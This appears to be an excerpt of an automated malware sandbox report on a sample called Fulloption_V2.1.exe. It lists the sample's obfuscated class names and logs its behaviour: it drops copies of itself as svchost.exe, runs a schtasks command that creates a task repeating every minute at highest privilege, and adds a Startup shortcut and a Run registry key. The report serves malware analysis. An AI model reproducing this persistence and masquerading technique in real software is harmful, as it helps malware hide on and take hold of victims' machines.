                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.csHigh entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.csHigh entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csHigh entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.csHigh entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csHigh entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csHigh entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'
                        Source: svchost.exe.3.dr, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.csHigh entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
                        Source: svchost.exe.3.dr, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.csHigh entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
                        Source: svchost.exe.3.dr, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
                        Source: svchost.exe.3.dr, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.csHigh entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
                        Source: svchost.exe.3.dr, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.csHigh entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
                        Source: svchost.exe.3.dr, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.csHigh entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
                        Source: svchost.exe.3.dr, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.csHigh entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
                        Source: svchost.exe.3.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csHigh entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
                        Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.csHigh entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
                        Source: svchost.exe.3.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csHigh entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
                        Source: svchost.exe.3.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csHigh entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeFile created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\ProgramData\svchost.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
